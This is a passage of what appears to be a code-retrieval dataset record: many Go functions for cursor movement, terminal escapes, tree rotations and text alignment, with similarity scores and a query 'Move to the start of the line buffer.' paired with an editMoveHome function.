tv.CursorBBox(tv.CursorPos)\n\treturn tv.ScrollToRight(curBBox.Max.X)\n}", "func moveTabRight(o *Otop) error {\n\treturn o.moveTab(1)\n}", "func (ebox *Editbox) moveCursorDown() {\n\tif ebox.wrap {\n\t\ted := ebox.editor\n\t\tline := ed.currentLine()\n\t\t// Try to move within current line\n\t\tif ed.cursor.x+ebox.width < len(line.text) {\n\t\t\ted.cursor.x += ebox.width\n\t\t\treturn\n\t\t}\n\t\tif ebox.cursor.x+(len(line.text)-ed.cursor.x)-1 >= ebox.width {\n\t\t\ted.cursor.x = line.lastRuneX()\n\t\t\treturn\n\t\t}\n\t\t// Jump to next line\n\t\tif ed.cursor.y+1 > len(ed.lines)-1 {\n\t\t\treturn\n\t\t}\n\t\ted.cursor.y += 1\n\t\tline = ed.currentLine()\n\t\tif len(line.text) == 0 {\n\t\t\ted.cursor.x = 0\n\t\t\treturn\n\t\t}\n\t\tx, _ := ebox.editorToBox(ed.lastx, 0)\n\t\tif x >= len(line.text) {\n\t\t\ted.cursor.x = line.lastRuneX()\n\t\t} else {\n\t\t\ted.cursor.x = x\n\t\t}\n\t} else {\n\t\tebox.editor.moveCursorVert(+1)\n\t}\n}", "func (e *LineEditor) CursorLeft() {\n\n\tif e.Cx > 0 {\n\t\te.Cx--\n\t}\n}", "func (i *Input) CursorLeft() {\n\tif i.Pos > 0 {\n\t\ti.Pos--\n\t}\n}", "func (o DashboardSpacingOutput) Right() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DashboardSpacing) *string { return v.Right }).(pulumi.StringPtrOutput)\n}", "func (m *Model) deleteWordRight() bool {\n\tif m.pos >= len(m.value) || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.deleteAfterCursor()\n\t}\n\n\toldPos := m.pos\n\tm.setCursor(m.pos + 1)\n\tfor unicode.IsSpace(m.value[m.pos]) {\n\t\t// ignore series of whitespace after cursor\n\t\tm.setCursor(m.pos + 1)\n\n\t\tif m.pos >= len(m.value) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tfor m.pos < len(m.value) {\n\t\tif !unicode.IsSpace(m.value[m.pos]) {\n\t\t\tm.setCursor(m.pos + 1)\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif m.pos > len(m.value) {\n\t\tm.value = m.value[:oldPos]\n\t} else {\n\t\tm.value = append(m.value[:oldPos], m.value[m.pos:]...)\n\t}\n\n\treturn m.setCursor(oldPos)\n}", "func (b *TestDriver) Right(val int) error {\n\tlog.Printf(\"Right: %d\", val)\n\n\treturn nil\n}", "func (d *Display) CursorLeft() error {\n\t_, err := d.port.Write([]byte(CursorLeft))\n\treturn err\n}", "func (e *Tree) SetRight(replacement *Tree) { e.right = replacement }", "func MoveRightRename(cf CornerFace) CornerFace {\n\tswitch cf {\n\tcase FACE_FRONT:\n\t\treturn FACE_LEFT\n\tcase FACE_LEFT:\n\t\treturn FACE_BACK\n\tcase FACE_BACK:\n\t\treturn FACE_RIGHT\n\tcase FACE_RIGHT:\n\t\treturn FACE_FRONT\n\t}\n\treturn cf // no translation for top needed\n}", "func MoveCursorForward(bias int) {\n\tfmt.Fprintf(Screen, \"\\033[%dC\", bias)\n}", "func (r *RoverDriver) Left() {\n r.commands <- left\n}", "func (s *State) RotateRight() {\n\tif s.robotLost {\n\t\treturn\n\t}\n\tswitch s.direction {\n\tcase North:\n\t\ts.direction = East\n\t\tbreak\n\tcase South:\n\t\ts.direction = West\n\t\tbreak\n\tcase West:\n\t\ts.direction = North\n\t\tbreak\n\tcase East:\n\t\ts.direction = South\n\t\tbreak\n\t}\n}", "func CursorMove(x, y int) string {\n\tvar s string\n\tif x < 0 {\n\t\ts = Esc + strconv.Itoa(-x) + \"D\"\n\t} else if x > 0 {\n\t\ts = Esc + strconv.Itoa(x) + \"C\"\n\t}\n\tif y < 0 {\n\t\ts += Esc + strconv.Itoa(-y) + \"A\"\n\t} else if y > 0 {\n\t\ts += Esc + strconv.Itoa(y) + \"B\"\n\t}\n\treturn s\n}", "func (ls *linestate) editMoveLeft() {\n\tif ls.pos > 0 {\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func RightShift(scope *Scope, x tf.Output, y tf.Output) (z tf.Output) {\n\tif scope.Err() != nil {\n\t\treturn\n\t}\n\topspec := tf.OpSpec{\n\t\tType: \"RightShift\",\n\t\tInput: []tf.Input{\n\t\t\tx, y,\n\t\t},\n\t}\n\top := scope.AddOperation(opspec)\n\treturn op.Output(0)\n}", "func CursorBackward(c uint) {\n\temitEscape(\"D\", c)\n}", "func MoveCursorBackward(bias int) {\n\tfmt.Fprintf(Screen, \"\\033[%dD\", bias)\n}", "func (q Quat) Right() Vec3f {\n\treturn q.RotateVec(Vec3f{1, 0, 0})\n}", "func (o DashboardSpacingPtrOutput) Right() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *DashboardSpacing) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Right\n\t}).(pulumi.StringPtrOutput)\n}", "func RestoreCursorPos() {\n\temitEscape(\"u\")\n}", "func MoveCursorDown(bias int) {\n\tfmt.Fprintf(Screen, \"\\033[%dB\", bias)\n}", "func (v Vect) TurnRight() Vect {\n\tif v.X == 0 {\n\t\tif v.Y == 1 {\n\t\t\treturn Vect{1, 0}\n\t\t}\n\t\tif v.Y == -1 {\n\t\t\treturn Vect{-1, 0}\n\t\t}\n\t}\n\tif v.X == -1 {\n\t\treturn Vect{0, 1}\n\t}\n\treturn Vect{0, -1}\n}", "func (Screen *ScreenManager) MoveCursorDown(spaces int) {\n\tfmt.Fprintf(Screen.Buffer, MOVE_CURSOR_DOWN_ROWS, spaces)\n\tif Screen.AutoFlush {\n\t\tScreen.Flush()\n\t}\n}", "func (Screen *ScreenManager) MoveCursorBackward(spaces int) {\n\tfmt.Fprintf(Screen.Buffer, MOVE_CURSOR_BACKWARD_COLUMNS, spaces)\n\tif Screen.AutoFlush {\n\t\tScreen.Flush()\n\t}\n}", "func (tv *TextView) ScrollToRight(pos int) bool {\n\tly := tv.ParentScrollLayout()\n\tif ly == nil {\n\t\treturn false\n\t}\n\treturn ly.ScrollDimToEnd(mat32.X, pos)\n}", "func MoveCursor(pos int, d int) []byte {\n\tp := []byte(fmt.Sprintf(\"%d\", pos))\n\treturn concat(open, p, dir[d])\n}", "func CursorDown(r uint) {\n\temitEscape(\"B\", r)\n}", "func ColumnRight(name string) {\n\tidx := colIndex(name)\n\tif idx < len(GlobalColumns)-1 {\n\t\tswapCols(idx, idx+1)\n\t}\n}", "func llrbMoveRedRight(root *llrbNode) *llrbNode {\n llrbFlipColor(root)\n if llrbIsRed(root.left.left) {\n root = llrbRotateRight(root)\n llrbFlipColor(root)\n }\n return root\n}", "func (board *Board) Right() *Board {\n\tblankPosition := board.PositionOfBlank()\n\tif (blankPosition+1)%board.Dimension == 0 {\n\t\treturn nil\n\t}\n\n\tclone := board.Clone()\n\tclone.move = RIGHT\n\ttile := clone.GetTileAt(blankPosition + 1)\n\tclone.SetTileAt(blankPosition+1, BLANK)\n\tclone.SetTileAt(blankPosition, tile)\n\tclone.cost = clone.g + clone.Cost()\n\treturn clone\n}", "func Right(text string, size int) string {\n\tspaces := size - Length(text)\n\tif spaces <= 0 {\n\t\treturn text\n\t}\n\n\tvar buffer bytes.Buffer\n\tfor i := 0; i < spaces; i++ {\n\t\tbuffer.WriteString(space)\n\t}\n\n\tbuffer.WriteString(text)\n\treturn buffer.String()\n}", "func Right(i int) int {\n\treturn 2*i + 1\n}", "func (fn *formulaFuncs) RIGHT(argsList *list.List) formulaArg {\n\treturn fn.leftRight(\"RIGHT\", argsList)\n}", "func (g *game) moveCursor(rowDelta, columnDelta int) {\n\tnewRow := g.selectedIndex.Row + rowDelta\n\tnewColumn := g.selectedIndex.Column + columnDelta\n\n\tif newRow >= 0 && newRow < g.Height && newColumn >= 0 && newColumn < g.Width {\n\t\tg.selectedIndex.Row = newRow\n\t\tg.selectedIndex.Column = newColumn\n\t\tg.Render()\n\t}\n}", "func (n *Node) MoveRight(p []int, i int) {\n\tif i%NumberColumns != 3 {\n\t\tc := n.ClonePuzzle()\n\t\ttemp := c[i+1]\n\t\tc[i+1] = c[i]\n\t\tc[i] = temp\n\n\t\tchild := NewPuzzle(c)\n\t\tchild.Move = boardPositions[i+1]\n\t\tchild.Parent = n\n\t\tchild.G = n.G + 1\n\t\tn.Children = append(n.Children, child)\n\t}\n}", "func Right() {\n\tpanic(\"Please implement the Right function\")\n}", "func (view *ListView) MoveCursor(dir Direction) {\n\tswitch dir {\n\tcase Up:\n\t\tif view.curline > 0 {\n\t\t\tview.curline--\n\t\t}\n\tcase Down:\n\t\tif view.curline < view.h-1 {\n\t\t\tview.curline++\n\t\t}\n\t}\n\tview.Refresh()\n}", "func lexRightDelim(l *lexer) stateFn {\n\tl.pos += Pos(len(l.rightDelim))\n\tl.emit(itemRightDelim)\n\tif l.peek() == '\\\\' {\n\t\tl.pos++\n\t\tl.emit(itemElideNewline)\n\t}\n\treturn lexText\n}", "func (e *LineEditor) CursorEnd() {\n\te.Cx = len(e.Row)\n}", "func (xs *Sheet) SetRightToLeft(rightToLeft int) {\n\txs.xb.lib.NewProc(\"xlSheetSetRightToLeftW\").\n\t\tCall(xs.self, I(rightToLeft))\n}", "func right(index int) int {\n\treturn 2*index + 2\n}", "func (c *Console) Left(n Int) *Console {\n\tPrint(_CSI + n.ToString() + \"D\")\n\treturn c\n}", "func (n *Node) MoveDownRight(p []int, i int) {\n\tif i%NumberColumns != 3 && i < 8 {\n\t\tc := n.ClonePuzzle()\n\t\ttemp := c[i+5]\n\t\tc[i+5] = c[i]\n\t\tc[i] = temp\n\n\t\tchild := NewPuzzle(c)\n\t\tchild.Move = boardPositions[i+5]\n\t\tchild.Parent = n\n\t\tchild.G = n.G + 1\n\t\tn.Children = append(n.Children, child)\n\t}\n}", "func (v *TextView) SetRightMargin(margin int) {\n\tC.gtk_text_view_set_right_margin(v.native(), C.gint(margin))\n}", "func AlignRight(text string, iconWidth int, xFontName string) string {\n\toText := text\n\tmodifier := 0\n\tcaretPos := HasSwitches(oText)\n\tfor caretPos != -1 {\n\t\tx := oText[caretPos:]\n\t\tif iconWidth != -1 {\n\t\t\tcommandStart := strings.IndexRune(x, '(')\n\t\t\tcommand := x[1:commandStart]\n\t\t\tif command == \"i\" {\n\t\t\t\t//If we encounter an icon\n\t\t\t\tmodifier += iconWidth\n\t\t\t} else if command == \"r\" || command == \"ro\" {\n\t\t\t\t//Special clause if we encounter a rectangle\n\t\t\t\t// -- we can calculate a rectangle's width.\n\t\t\t\tcommandEnd := strings.IndexRune(x, ')')\n\t\t\t\trectangle := x[commandStart+1 : commandEnd]\n\t\t\t\tif rectangle != \"\" {\n\t\t\t\t\tval, err := strconv.Atoi(strings.Split(rectangle, \"x\")[0])\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tpanic(err)\n\t\t\t\t\t}\n\t\t\t\t\tmodifier += val\n\t\t\t\t}\n\t\t\t} else if command == \"c\" || command == \"co\" {\n\t\t\t\tcommandEnd := strings.IndexRune(x, ')')\n\t\t\t\tcircle := x[commandStart+1 : commandEnd]\n\t\t\t\tif circle != \"\" {\n\t\t\t\t\tval, err := strconv.Atoi(strings.Split(circle, \"-\")[0])\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tpanic(err)\n\t\t\t\t\t}\n\t\t\t\t\tmodifier += val\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tx = x[strings.IndexRune(x, ')')+1:]\n\t\toText = oText[:caretPos] + x\n\t\tcaretPos = HasSwitches(oText)\n\t}\n\treturn \"^p(_RIGHT)^p(-\" + strconv.Itoa(int(textwidth.Get(xFontName, oText))+modifier) + \")\" + text + \"^p()\"\n}", "func (mu *ModelUpdate) SetRight(b bool) *ModelUpdate {\n\tmu.mutation.SetRight(b)\n\treturn mu\n}", "func (sopsTxtJustify TextJustify) Right() TextJustify {\n\n\tlockStrOpsTextJustify.Lock()\n\n\tdefer lockStrOpsTextJustify.Unlock()\n\n\treturn TextJustify(2)\n}", "func (s Square) Right() int {\n\treturn s.left + s.width\n}", "func (w *ListWidget) MoveEnd() {\n\tw.ChangeSelection(w.itemCount() - 1)\n}", "func (s *swimmer) setDirection(right bool) {\n\tif right {\n\t\ts.moveDirection = 1\n\t} else {\n\t\ts.moveDirection = -1\n\t}\n}", "func CursorForward(c uint) {\n\temitEscape(\"C\", c)\n}", "func (n *Node) rotateRight(c *Node) {\n\tl := c.Left\n\tc.Left = l.Right\n\tl.Right = c\n\tif c == n.Left {\n\t\tn.Left = l\n\t} else {\n\t\tn.Right = l\n\t}\n\tc.bal = 0\n\tl.bal = 0\n}", "func (w *VT100Writer) CursorBack(n int) {\n\tif n < 0 {\n\t\tw.CursorForward(-n)\n\t} else if n > 0 {\n\t\ts := strconv.Itoa(n)\n\t\tw.WriteRaw([]byte{0x1b, '['})\n\t\tw.WriteRaw([]byte(s))\n\t\tw.WriteRaw([]byte{'D'})\n\t}\n}", "func (rbTree *RBTree)rotateRight(X *treeNode) {\n\tvar Y = X.left\n\t// move W to X's left child\n\tX.left = Y.right\n\tif Y.right != nil {\n\t\tY.right.father = X\n\t}\n\t// move Y to X's father's child\n\tY.father = X.father\n\tif X == rbTree.root {\n\t\t// X is root\n\t \trbTree.root = Y\n\t} else if X == X.father.right {\n\t\t// X is father's left child\n\t\tX.father.right = Y\n\t} else {\n\t\t// X is father's right child\n\t\tX.father.left = Y\n\t}\n\t// move X to Y's right child\n\tY.right = X\n\tX.father = Y\n}", "func (e *Tree) Right() *Tree { return e.right }", "func (s *seqBuf) leftOrRightCloserToSeq(seq, whichSeq seqNum) direction {\n\tdiff1 := s.getDiff(seq, whichSeq)\n\tdiff2 := s.getDiff(whichSeq, seq)\n\n\tif diff1 == diff2 {\n\t\treturn equal\n\t}\n\n\tif diff1 > diff2 {\n\t\t// This will cause an insert at the current position.\n\t\tif s.maxSeqNumDiff > 0 && diff2 > s.maxSeqNumDiff {\n\t\t\treturn left\n\t\t}\n\n\t\treturn right\n\t}\n\n\treturn left\n}", "func (Screen *ScreenManager) MoveCursorForward(spaces int) {\n\tfmt.Fprintf(Screen.Buffer, MOVE_CURSOR_FORWARD_COLUMNS, spaces)\n\tif Screen.AutoFlush {\n\t\tScreen.Flush()\n\t}\n}", "func MoveCursor(row int, column int) {\n\tfmt.Printf(CSI+CursorPositionSeq, row, column)\n}", "func (c *Cursor) Backward(n int) {\n\t(*c).Index -= n\n}", "func CursorDown(g *gocui.Gui, v *gocui.View) error {\n\tif v != nil {\n\t\tcx, cy := v.Cursor()\n\t\tif err := v.SetCursor(cx, cy+1); err != nil {\n\t\t\tox, oy := v.Origin()\n\t\t\tif err := v.SetOrigin(ox, oy+1); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func moveViewCursorDown(g *gocui.Gui, v *gocui.View, allowEmpty bool) error {\n\tcx, cy := v.Cursor()\n\tox, oy := v.Origin()\n\tnextLine, err := getNextViewLine(g, v)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !allowEmpty && nextLine == \"\" {\n\t\treturn nil\n\t}\n\tif err := v.SetCursor(cx, cy+1); err != nil {\n\t\tif err := v.SetOrigin(ox, oy+1); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (xs *Sheet) SetMarginRight(margin float64) {\n\txs.xb.lib.NewProc(\"xlSheetSetMarginRightW\").\n\t\tCall(xs.self, F(margin))\n}", "func (muo *ModelUpdateOne) SetRight(b bool) *ModelUpdateOne {\n\tmuo.mutation.SetRight(b)\n\treturn muo\n}", "func right(i int) int {\r\n\treturn (i * 2 ) + 2\r\n}", "func MoveCursor(x int, y int) {\n\tfmt.Fprintf(Screen, \"\\033[%d;%dH\", y, x)\n}", "func (b *TestDriver) RightFlip() (err error) {\n\tb.Publish(Rolling, true)\n\treturn nil\n}", "func (ls *linestate) editMoveEnd() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos = len(ls.buf)\n\t\tls.refreshLine()\n\t}\n}", "func (w *VT100Writer) RestoreCursor() {\n\t//fmt.Fprintln(os.Stderr, \"\\x1b[33;1mRCP\\x1b[m\")\n\tw.WriteRaw([]byte{0x1b, '[', 'u'})\n}", "func right(i int) int {\n\treturn i*2 + 2\n}", "func (terminal *Terminal) MoveCursor(x int, y int) {\n\tfmt.Fprintf(screen, \"\\033[%d;%dH\", x, y)\n}", "func (c *expression) extendRight(n *expression) *expression {\n\n\tc.right = n\n\tn.parent = c\n\n\tfmt.Printf(\"++++++++++++++++++++++++++ extendRight FROM %s -> [%s] \\n\", c.opr, n.opr)\n\treturn n\n}", "func (this *BigInteger) ShiftRight(n int64) *BigInteger {\n\tvar r *BigInteger = NewBigInteger()\n\tif n < 0 {\n\t\tthis.LShiftTo(-n, r)\n\t} else {\n\t\tthis.RShiftTo(n, r)\n\t}\n\treturn r\n}", "func RotateRight(t TermT, n uint32) TermT {\n\treturn TermT(C.yices_rotate_right(C.term_t(t), C.uint32_t(n)))\n}", "func (v *View) MoveCursor(m motion.Motion) {\n\trd := v.buffer.NewReader(v.cursor.Offset())\n\tif m.Move(v.buffer, rd) {\n\t\tpos, _ := rd.Seek(0, 1)\n\t\tv.cursor.Move(int(pos))\n\t}\n}", "func (w *VT100Writer) CursorDown(n int) {\n\tif n < 0 {\n\t\tw.CursorUp(-n)\n\t} else if n > 0 {\n\t\ts := strconv.Itoa(n)\n\t\tw.WriteRaw([]byte{0x1b, '['})\n\t\tw.WriteRaw([]byte(s))\n\t\tw.WriteRaw([]byte{'B'})\n\t}\n}", "func (s Stream) DropRight(input interface{}) Stream {\n\ts.operations = append(s.operations, &streamDropRight{\n\t\tItemsValue: s.itemsValue,\n\t\tItemsType: s.itemsType,\n\t\tItem: input,\n\t\tOption: drop.Right,\n\t})\n\treturn s\n}", "func (tm *Term) ScrollLeft() error {\n\ttm.ColSt = ints.MaxInt(tm.ColSt-1, 0)\n\treturn tm.Draw()\n}", "func (tree *RBTree) rotateRight(node *RBTreeNode) {\n\tif node == nil {\n\t\treturn\n\t}\n\tl := node.left\n\tnode.left = l.right\n\tif l.right != nil {\n\t\tl.right.parent = node\n\t}\n\n\tl.parent = node.parent\n\tif node.parent == nil {\n\t\ttree.root = l\n\t} else {\n\t\tif node.parent.left == node {\n\t\t\tnode.parent.left = l\n\t\t} else {\n\t\t\tnode.parent.right = l\n\t\t}\n\t}\n\tnode.parent = l\n\tl.right = node\n}", "func rightShift(s *keyboard.State) (*Violation, error) {\n if len(s.LastCharacters) < 1 {\n return nil, status.Error(\n codes.FailedPrecondition,\n \"rightshift vimprovement check ran before character input was received.\",\n )\n }\n if s.RightShiftDown && rightShiftViolatingKeys[s.LastCharacters[0]] {\n return &rsViolation, nil\n }\n return nil, nil\n}", "func (b *Bar) TrimRightSpace() *Bar {\n\tif isClosed(b.done) {\n\t\treturn b\n\t}\n\tb.trimRightCh <- true\n\treturn b\n}", "func (c *Cursor) Last() {\n\tc.pos = c.end - 1\n}" ]
[ "0.7856465", "0.78023463", "0.76541454", "0.699471", "0.693096", "0.6794503", "0.67479396", "0.67300725", "0.6594457", "0.6572439", "0.65516806", "0.64767385", "0.64715546", "0.6293926", "0.625782", "0.6238422", "0.6194988", "0.61666787", "0.6080963", "0.6056318", "0.60210586", "0.5922624", "0.5920955", "0.5898892", "0.5873382", "0.5865836", "0.58605176", "0.58327806", "0.5792728", "0.579272", "0.57882434", "0.5772142", "0.5766558", "0.57653457", "0.5760622", "0.5754819", "0.57377803", "0.57112855", "0.57112813", "0.5710891", "0.5702501", "0.56910527", "0.5681623", "0.5677305", "0.5674666", "0.5657036", "0.5653237", "0.5627691", "0.56096035", "0.55653036", "0.5554186", "0.5547956", "0.5538841", "0.55124193", "0.5485368", "0.54748225", "0.5435779", "0.5420602", "0.5398049", "0.5377297", "0.5361665", "0.53444785", "0.53418523", "0.5335887", "0.53324455", "0.53324026", "0.53122485", "0.53084195", "0.5299557", "0.5287583", "0.5287352", "0.5285829", "0.52838874", "0.52804667", "0.5273364", "0.5259687", "0.5257722", "0.52561736", "0.52527916", "0.5239014", "0.5238997", "0.52388644", "0.522572", "0.5222423", "0.5220703", "0.5219106", "0.5216316", "0.5210781", "0.519683", "0.5189477", "0.5182682", "0.51702565", "0.51551974", "0.51276404", "0.5121113", "0.51040703", "0.5101499", "0.5093522", "0.50885636", "0.5088037" ]
0.75334066
3
Move to the start of the line buffer.
func (ls *linestate) editMoveHome() { if ls.pos > 0 { ls.pos = 0 ls.refreshLine() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (lexer *Lexer) nextLine() {\n lexer.position.Col = 0\n lexer.position.Row++\n}", "func (e *Editor) prepend(s string) {\n\tif e.singleLine {\n\t\ts = strings.ReplaceAll(s, \"\\n\", \" \")\n\t}\n\te.caret.start.ofs = e.editBuffer.deleteRunes(e.caret.start.ofs,\n\t\te.caret.end.ofs-e.caret.start.ofs) // Delete any selection first.\n\te.editBuffer.prepend(e.caret.start.ofs, s)\n\te.caret.start.xoff = 0\n\te.invalidate()\n}", "func (p *MultiLineParser) sendLine() {\n\tdefer func() {\n\t\tp.buffer.Reset()\n\t\tp.rawDataLen = 0\n\t}()\n\n\tcontent := make([]byte, p.buffer.Len())\n\tcopy(content, p.buffer.Bytes())\n\tif len(content) > 0 || p.rawDataLen > 0 {\n\t\tp.lineHandler.Handle(NewMessage(content, p.status, p.rawDataLen, p.timestamp))\n\t}\n}", "func (tv *TextView) CursorStartLine() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tpos := tv.CursorPos\n\n\tgotwrap := false\n\tif wln := tv.WrappedLines(pos.Ln); wln > 1 {\n\t\tsi, ri, _ := tv.WrappedLineNo(pos)\n\t\tif si > 0 {\n\t\t\tri = 0\n\t\t\tnwc, _ := tv.Renders[pos.Ln].SpanPosToRuneIdx(si, ri)\n\t\t\tpos.Ch = nwc\n\t\t\ttv.CursorPos = pos\n\t\t\ttv.CursorCol = ri\n\t\t\tgotwrap = true\n\t\t}\n\t}\n\tif !gotwrap {\n\t\ttv.CursorPos.Ch = 0\n\t\ttv.CursorCol = tv.CursorPos.Ch\n\t}\n\t// fmt.Printf(\"sol cursorcol: %v\\n\", tv.CursorCol)\n\ttv.SetCursor(tv.CursorPos)\n\ttv.ScrollCursorToLeft()\n\ttv.RenderCursor(true)\n\ttv.CursorSelect(org)\n}", "func ClearLinePartialForward() {\n\temitEscape(\"K\")\n}", "func (ls *linestate) deleteToEnd() {\n\tls.buf = ls.buf[:ls.pos]\n\tls.refreshLine()\n}", "func (l *Lexer) updateStart() {\n\tif l.b {\n\t\tl.S = l.n - 1\n\t} else {\n\t\tl.S = l.n\n\t}\n}", "func (cc *Reader) ReadLine() ([]byte, error) {\n\tfor {\n\t\t// try to find a terminated line in the buffered data already read\n\t\tnlidx := bytes.IndexByte(cc.buf[cc.searchFrom:cc.end], '\\n')\n\t\tif nlidx != -1 {\n\t\t\t// got a complete line\n\t\t\tline := cc.buf[cc.start : cc.searchFrom+nlidx]\n\t\t\tcc.start = cc.searchFrom + nlidx + 1\n\t\t\tcc.searchFrom = cc.start\n\t\t\t// treat \\r\\n as the line terminator if it was present\n\t\t\tif 0 < len(line) && line[len(line)-1] == '\\r' {\n\t\t\t\tline = line[:len(line)-1]\n\t\t\t}\n\t\t\treturn line, nil\n\t\t}\n\n\t\t// are we out of space? we can read more if any of these are true:\n\t\t// 1. cc.start != 0, so we can slide the existing data back\n\t\t// 2. cc.end < len(cc.buf), so we can read data into the end of the buffer\n\t\t// 3. len(cc.buf) < cc.maxSize, so we can grow the buffer\n\t\tif cc.start == 0 && cc.end == len(cc.buf) && len(cc.buf) == cc.maxSize {\n\t\t\treturn nil, ErrReadQ\n\t\t}\n\n\t\tif cc.eof {\n\t\t\treturn nil, io.EOF\n\t\t}\n\n\t\tif len(cc.buf) < cc.maxSize && (len(cc.buf)-(cc.end-cc.start) < cc.initialSize/2) {\n\t\t\t// allocate a new buffer, copy any remaining data\n\t\t\tnewLen := roundUpToPowerOfTwo(len(cc.buf) + 1)\n\t\t\tif newLen > cc.maxSize {\n\t\t\t\tnewLen = cc.maxSize\n\t\t\t} else if newLen < cc.initialSize {\n\t\t\t\tnewLen = cc.initialSize\n\t\t\t}\n\t\t\tnewBuf := make([]byte, newLen)\n\t\t\tcopy(newBuf, cc.buf[cc.start:cc.end])\n\t\t\tcc.buf = newBuf\n\t\t} else if cc.start != 0 {\n\t\t\t// slide remaining data back to the front of the buffer\n\t\t\tcopy(cc.buf, cc.buf[cc.start:cc.end])\n\t\t}\n\t\tcc.end = cc.end - cc.start\n\t\tcc.start = 0\n\n\t\tcc.searchFrom = cc.end\n\t\tn, err := cc.conn.Read(cc.buf[cc.end:])\n\t\tcc.end += n\n\t\tif n != 0 && err == io.EOF {\n\t\t\t// we may have received new \\n-terminated lines, try to parse them\n\t\t\tcc.eof = true\n\t\t} else if err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n}", "func (b *Buffer) MoveLinesUp(start int, end int) {\n\t// 0 < start < end <= len(b.lines)\n\tif start < 1 || start >= end || end > len(b.lines) {\n\t\treturn // what to do? FIXME\n\t}\n\tif end == len(b.lines) {\n\t\tb.Insert(\n\t\t\tLoc{\n\t\t\t\tutf8.RuneCount(b.lines[end-1].data),\n\t\t\t\tend - 1,\n\t\t\t},\n\t\t\t\"\\n\"+b.Line(start-1),\n\t\t)\n\t} else {\n\t\tb.Insert(\n\t\t\tLoc{0, end},\n\t\t\tb.Line(start-1)+\"\\n\",\n\t\t)\n\t}\n\tb.Remove(\n\t\tLoc{0, start - 1},\n\t\tLoc{0, start},\n\t)\n}", "func (b *Buffer) Reset() {\n\tb.Line = b.Line[:0]\n\tb.Val = b.Val[:0]\n}", "func (l *lexer) reset() {\n\tl.line -= strings.Count(l.input[l.start:l.pos], \"\\n\")\n\tl.pos = l.start\n}", "func (hw *HighlightedWriter) EraseStartOfLine() {\n\thw.delegate.EraseStartOfLine()\n}", "func (logSeeker *LogSeeker) SeekLinePosition(pos int64) (offset int64, err error) {\n\tif pos == 0 {\n\t\treturn 0, nil\n\t}\n\n\toffset, err = logSeeker.file.Seek(pos, os.SEEK_SET)\n\n\tif err != nil {\n\t\treturn offset, err\n\t}\n\n\tlineSep := byte('\\n')\n\tbuf := make([]byte, 1)\n\n\t_, err = logSeeker.file.Read(buf)\n\n\tif err != nil && err != io.EOF {\n\t\treturn 0, err\n\t}\n\n\tif buf[0] == lineSep {\n\t\toffset, err = logSeeker.Tell()\n\t\treturn\n\t}\n\n\toffset, err = logSeeker.Tell()\n\n\tvar stepSize int64 = 1024\n\n\tseekPos := stepSize\n\tfound := false\n\ti := 0\n\tfor {\n\n\t\tfound = false\n\n\t\tif offset == 0 {\n\t\t\tbreak\n\t\t}\n\n\t\tif offset <= stepSize {\n\t\t\tseekPos = offset\n\t\t} else {\n\t\t\tseekPos = stepSize\n\t\t}\n\n\t\t// fmt.Printf(\"before Seek pos: %d %d\\n\", offset, seekPos)\n\n\t\toffset, err = logSeeker.file.Seek(seekPos*-1, os.SEEK_CUR) // get left chars\n\t\t// fmt.Printf(\"before ReadAt pos: %d\\n\", offset)\n\t\tif err != nil {\n\t\t\tbreak\n\t\t}\n\n\t\tbuf = make([]byte, seekPos)\n\n\t\trealSize, err := logSeeker.file.Read(buf)\n\n\t\tif err != nil {\n\t\t\tbreak\n\t\t}\n\t\t// fmt.Printf(\"before content: %v\\n\", string(buf))\n\n\t\ti = realSize - 1\n\t\tfor ; i >= 0; i-- {\n\t\t\tif buf[i] == lineSep {\n\t\t\t\tfound = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tif found {\n\n\t\t\t// fmt.Printf(\"Tell pos 1: %d,%d\\n\", offset, i)\n\n\t\t\toffset, err = logSeeker.file.Seek(int64(i-realSize+1), os.SEEK_CUR) //fallback\n\t\t\t// fmt.Printf(\"last pos: %d\\n\", offset)\n\n\t\t\tbreak\n\t\t} else {\n\t\t\toffset, err = logSeeker.file.Seek(int64(realSize)*-1, os.SEEK_CUR)\n\t\t}\n\n\t}\n\n\treturn\n}", "func (c *Cursor) First() {\n\tc.pos = c.start\n}", "func advanceBuffer(buff *bytes.Buffer, num int) {\n\tbuff.Next(num)\n\t// move buffer from num offset to 0\n\tbytearr := buff.Bytes()\n\tbuff.Reset()\n\tbuff.Write(bytearr)\n}", "func (i *Input) backspace() {\n\tcurLine := i.lines[i.cursorLineIndex]\n\t// at the beginning of the buffer, nothing to do\n\tif len(curLine) == 0 && i.cursorLineIndex == 0 {\n\t\treturn\n\t}\n\n\t// at the beginning of a line somewhere in the buffer\n\tif i.cursorLinePos == 0 {\n\t\tprevLine := i.lines[i.cursorLineIndex-1]\n\t\t// remove the newline character from the prevline\n\t\tprevLine = prevLine[:len(curLine)-1] + curLine\n\t\ti.lines = append(i.lines[:i.cursorLineIndex], i.lines[i.cursorLineIndex+1:]...)\n\t\ti.cursorLineIndex--\n\t\ti.cursorLinePos = len(prevLine) - 1\n\t\treturn\n\t}\n\n\t// I'm at the end of a line\n\tif i.cursorLinePos == len(curLine)-1 {\n\t\ti.lines[i.cursorLineIndex] = curLine[:len(curLine)-1]\n\t\ti.cursorLinePos--\n\t\treturn\n\t}\n\n\t// I'm in the middle of a line\n\ti.lines[i.cursorLineIndex] = curLine[:i.cursorLinePos-1] + 